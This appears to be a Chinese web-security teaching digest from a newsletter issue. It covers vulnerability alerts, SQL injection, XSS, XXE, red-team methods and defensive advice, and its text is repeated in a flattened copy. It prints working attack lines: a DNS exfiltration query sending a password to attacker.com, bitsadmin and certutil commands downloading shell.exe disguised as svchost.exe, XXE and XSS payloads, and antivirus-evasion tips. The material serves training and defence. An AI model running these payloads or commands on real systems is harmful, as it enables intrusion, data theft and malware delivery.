专注Web及移动安全[红日安全99期]
字数 1833 2025-08-18 11:39:00

红日安全第99期 - Web及移动安全综合教学文档

一、安全动态与漏洞预警

1.1 近期高危漏洞预警

  • CVE-2019-16097 (Harbor权限提升漏洞)

    • 影响版本:Harbor 1.7.0-1.8.2
    • 漏洞原理:API接口权限校验不严导致普通用户可提升为管理员
    • 修复方案:升级至1.8.3或更高版本
  • CVE-2019-4505 (WebSphere任意文件读取)

    • 影响版本:IBM WebSphere Application Server 7.0/8.0/8.5/9.0
    • 利用方式:通过构造特殊URL读取服务器任意文件
    • 修复方案:安装IBM安全补丁
  • 泛微e-cology OA远程代码执行漏洞

    • 漏洞组件:WorkflowCenterTreeData接口
    • 利用条件:未授权访问
    • 风险等级:高危
  • phpStudy后门事件

    • 影响版本:phpStudy 2016/2018部分版本
    • 后门特征:php_xmlrpc.dll模块包含恶意代码
    • 检测方法:检查文件MD5值

1.2 红队技术要点

  • 红队工作流程:
    1. 信息收集
    2. 漏洞探测
    3. 权限获取
    4. 权限维持
    5. 横向移动
    6. 目标达成

二、Web安全核心技术

2.1 SQL注入进阶

  • 绕过技巧:

    • 注释符绕过:/*!50000select*/
    • 等价函数替换:substringmidsubstr
    • 空白符替换:%09(tab), %0a(换行), %0c(换页)
    • 编码绕过:hex/urlencode/base64
  • 带外通道(OOB)利用:

    • DNS外带:LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\abc'))
    • HTTP外带:通过xp_cmdshell执行curl命令

2.2 XSS漏洞实战

  • 蝉知CMS 5.6反射型XSS

    • 漏洞位置:/index.php?m=block&f=main&id=1
    • 利用参数:id参数未过滤导致XSS
    • POC:id=1'"><script>alert(1)</script>
  • PbootCMS存储型XSS

    • 漏洞位置:后台模板编辑功能
    • 利用方式:插入恶意JS代码到模板文件
    • 修复建议:严格过滤<script>等危险标签

2.3 XXE漏洞利用

  • 本地DTD文件利用技巧:
    <!DOCTYPE foo [
      <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
      <!ENTITY % ISOamso '>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      '>
      %local_dtd;
    ]>
    

2.4 HTTP参数污染(HPP)

  • 利用场景:
    • 登录绕过:user=admin&user=guest
    • SQL注入:id=1&id=2 union select 1,2,3--
    • XSS攻击:name=test&name=<script>alert(1)</script>

三、渗透测试实战技巧

3.1 权限维持技术

  • Bitsadmin下载payload

    bitsadmin /transfer job /download /priority high http://attacker.com/shell.exe C:\Windows\Temp\svchost.exe
    
  • Certutil下载payload

    certutil -urlcache -split -f http://attacker.com/shell.exe C:\Windows\Temp\svchost.exe
    

3.2 MSSQL攻击方法

  • PowerUpSQL使用要点
    • 发现SQL Server实例:
      Get-SQLInstanceDomain
      
    • 弱口令爆破:
      Invoke-SQLAudit -Instance "sqlserver.domain.com" -Username "sa" -Password "Password123"
      
    • 命令执行:
      Invoke-SQLOSCmd -Instance "sqlserver.domain.com" -Command "whoami" -Username "sa" -Password "Password123"
      

3.3 免杀技术

  • MSF后门免杀技巧:
    • 编码器组合:shikata_ga_nai+x86/call4_dword_xor
    • 进程注入:迁移到合法进程(如explorer.exe)
    • 流量加密:使用SSL/TLS隧道

3.4 前端加密绕过

  • 常见加密方式:
    • Base64
    • MD5/SHA1
    • AES/RSA
    • 自定义加密算法
  • 绕过方法:
    1. 直接调用加密函数
    2. 修改JS代码移除加密
    3. 使用BurpSuite插件自动处理

四、安全工具集锦

4.1 内网探测工具

  • 基于Netbios的存活主机发现

    nmap -sU -p137 --script nbstat.nse 192.168.1.0/24
    
  • OneForAll子域名收集

    python oneforall.py --target example.com run
    

4.2 Web安全评估

  • Xray高级扫描

    xray webscan --basic-crawler http://example.com --html-output report.html
    
  • Websnort分析pcap

    websnort -r capture.pcap -c /etc/websnort/websnort.conf -l ./log
    

4.3 BurpSuite插件

  • MarkINFO敏感信息标记
    • 功能:自动高亮显示
      • API密钥
      • 密码字段
      • 身份证/手机号
      • 加密参数

五、Linux安全运维

5.1 常用安全命令

  • 用户监控:
    lastlog | grep -v "Never logged in"
    
  • 进程检查:
    ps aux --sort=-%mem | head -10
    
  • 网络连接:
    netstat -tulnp | grep -v "127.0.0.1"
    
  • 文件监控:
    find / -type f -perm -4000 -ls 2>/dev/null
    

六、防御建议

  1. Web应用防护

    • 输入输出过滤
    • 最小权限原则
    • CSP策略部署
    • 定期安全审计
  2. 系统加固

    • 及时打补丁
    • 关闭不必要服务
    • 日志集中管理
    • 文件完整性监控
  3. 应急响应

    • 建立事件响应流程
    • 保留原始证据
    • 分析攻击路径
    • 彻底清除后门

本教学文档涵盖了红日安全第99期核心内容,可作为Web及移动安全领域的实用参考手册。建议结合具体场景进行实践练习,并持续关注最新安全动态。

红日安全第99期 - Web及移动安全综合教学文档 一、安全动态与漏洞预警 1.1 近期高危漏洞预警 CVE-2019-16097 (Harbor权限提升漏洞) 影响版本:Harbor 1.7.0-1.8.2 漏洞原理:API接口权限校验不严导致普通用户可提升为管理员 修复方案:升级至1.8.3或更高版本 CVE-2019-4505 (WebSphere任意文件读取) 影响版本:IBM WebSphere Application Server 7.0/8.0/8.5/9.0 利用方式:通过构造特殊URL读取服务器任意文件 修复方案:安装IBM安全补丁 泛微e-cology OA远程代码执行漏洞 漏洞组件:WorkflowCenterTreeData接口 利用条件:未授权访问 风险等级:高危 phpStudy后门事件 影响版本:phpStudy 2016/2018部分版本 后门特征:php_ xmlrpc.dll模块包含恶意代码 检测方法:检查文件MD5值 1.2 红队技术要点 红队工作流程: 信息收集 漏洞探测 权限获取 权限维持 横向移动 目标达成 二、Web安全核心技术 2.1 SQL注入进阶 绕过技巧: 注释符绕过: /*!50000select*/ 等价函数替换: substring → mid → substr 空白符替换: %09 (tab), %0a (换行), %0c (换页) 编码绕过:hex/urlencode/base64 带外通道(OOB)利用: DNS外带: LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\abc')) HTTP外带:通过 xp_cmdshell 执行curl命令 2.2 XSS漏洞实战 蝉知CMS 5.6反射型XSS 漏洞位置: /index.php?m=block&f=main&id=1 利用参数: id 参数未过滤导致XSS POC: id=1'"><script>alert(1)</script> PbootCMS存储型XSS 漏洞位置:后台模板编辑功能 利用方式:插入恶意JS代码到模板文件 修复建议:严格过滤 <script> 等危险标签 2.3 XXE漏洞利用 本地DTD文件利用技巧: 2.4 HTTP参数污染(HPP) 利用场景: 登录绕过: user=admin&user=guest SQL注入: id=1&id=2 union select 1,2,3-- XSS攻击: name=test&name=<script>alert(1)</script> 三、渗透测试实战技巧 3.1 权限维持技术 Bitsadmin下载payload Certutil下载payload 3.2 MSSQL攻击方法 PowerUpSQL使用要点 发现SQL Server实例: 弱口令爆破: 命令执行: 3.3 免杀技术 MSF后门免杀技巧: 编码器组合: shikata_ga_nai + x86/call4_dword_xor 进程注入:迁移到合法进程(如explorer.exe) 流量加密:使用SSL/TLS隧道 3.4 前端加密绕过 常见加密方式: Base64 MD5/SHA1 AES/RSA 自定义加密算法 绕过方法: 直接调用加密函数 修改JS代码移除加密 使用BurpSuite插件自动处理 四、安全工具集锦 4.1 内网探测工具 基于Netbios的存活主机发现 OneForAll子域名收集 4.2 Web安全评估 Xray高级扫描 Websnort分析pcap 4.3 BurpSuite插件 MarkINFO敏感信息标记 功能:自动高亮显示 API密钥 密码字段 身份证/手机号 加密参数 五、Linux安全运维 5.1 常用安全命令 用户监控: 进程检查: 网络连接: 文件监控: 六、防御建议 Web应用防护 输入输出过滤 最小权限原则 CSP策略部署 定期安全审计 系统加固 及时打补丁 关闭不必要服务 日志集中管理 文件完整性监控 应急响应 建立事件响应流程 保留原始证据 分析攻击路径 彻底清除后门 本教学文档涵盖了红日安全第99期核心内容,可作为Web及移动安全领域的实用参考手册。建议结合具体场景进行实践练习,并持续关注最新安全动态。